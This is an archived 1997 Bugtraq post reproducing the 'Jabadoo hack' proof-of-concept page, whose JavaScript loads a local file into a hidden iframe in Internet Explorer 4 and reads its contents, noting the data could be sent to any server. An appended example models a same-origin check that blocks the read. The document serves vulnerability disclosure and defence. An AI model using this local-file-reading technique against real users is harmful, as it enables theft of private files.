Bugtraq mailing list archives
Jabadoo Security Hack
From: aleph1 () DFW NET (Aleph One)
Date: Fri, 17 Oct 1997 18:05:56 -0500
Well it seems Microsoft convinced the guys at Jabadoo to take down the demonstration page. For those that didn't get to see it, here it is (silly for them to think that taking it down after it was up would make a difference).

Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

---------- cut here ----------
<HTML>
<HEAD>
<TITLE>IE4 Jabadoo Hack</TITLE>
<SCRIPT LANGUAGE="JavaScript">
function init() {
    document.all("MyFrame1").src = 'file://c:/Windows/desktop/t1.txt';
    setTimeout ('getLinks()', 5000);
}
function getLinks() {
    alert(document.all("MyFrame1").document.body.outerHTML);
}
</SCRIPT>
</HEAD>
<BODY onLoad="init()">
<A HREF="http://www.jabadoo.de/"><IMG SRC="/images/logo-small.gif" BORDER=0></A>
<FONT SIZE=2 FACE=Arial><P>This sample page shows the first part of the <B>jabadoo hack</B>: </P>
With a delay of 5 seconds, the content of the file C:\WINDOWS\DESKTOP\T1.TXT is loaded by this sample page and displayed in a message box. </P>
In a second step, this content could be hidden in an url and transfered to every server on the net ...</P>
If you get an error message, the timeout of 5 seconds is propably too short or the file C:\WINDOWS\DESKTOP\T1.TXT does not exist on your computer ...</P>
<B>English Press Release</B></P>
<B>German Press Release</B></P>
<IFRAME STYLE="width=1px; height=1px;" NAME="MyFrame1" SRC="blank.html" >
</FONT>
</BODY>
</HTML>
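The script in the post reads the frame's DOM after the frame has been navigated from blank.html to a file:// URL. The following is an added example, not part of the original post and not any browser's code: a small model of the same-origin check, evaluated at read time against the frame's current location, that refuses that read. PAGE_URL and the Frame class are hypothetical names introduced for illustration.

```javascript
// Added example, not code from the original post. PAGE_URL is a constructed
// placeholder for wherever the demonstration page was served from.
const PAGE_URL = 'http://demo.example/hack.html';
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

// Origin string for http(s) URLs; null (opaque) for file: and anything unparsable.
function originOf(url, base) {
  let u;
  try { u = new URL(url, base); } catch (e) { return null; }
  if (!(u.protocol in DEFAULT_PORTS)) return null;
  return u.protocol + '//' + u.hostname + ':' + (u.port || DEFAULT_PORTS[u.protocol]);
}

// An opaque origin never matches anything, including another file: URL.
function sameOrigin(a, b) {
  return a !== null && b !== null && a === b;
}

// Minimal frame model (hypothetical): the access check runs on every read
// against the frame's current location, not the one it was created with.
class Frame {
  constructor(parentUrl, src) { this.parentUrl = parentUrl; this.navigate(src); }
  navigate(src) {
    try { this.location = new URL(src, this.parentUrl).href; }
    catch (e) { this.location = src; } // unparsable: keep raw, origin stays opaque
  }
  readableByParent() {
    return sameOrigin(originOf(this.parentUrl), originOf(this.location));
  }
}

// Replays the two frame states from the post and records the decision for each.
function replayPost() {
  const frame = new Frame(PAGE_URL, 'blank.html');     // <IFRAME SRC="blank.html">
  const before = frame.readableByParent();             // same origin: allowed
  frame.navigate('file://c:/Windows/desktop/t1.txt');  // what init() does in the post
  const after = frame.readableByParent();              // local file: refused
  return { before, after };
}

console.log(replayPost()); // run with Node.js
```

Checking only when the frame is created would pass, since blank.html is same-origin with the page; the decision has to be repeated at each DOM access.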
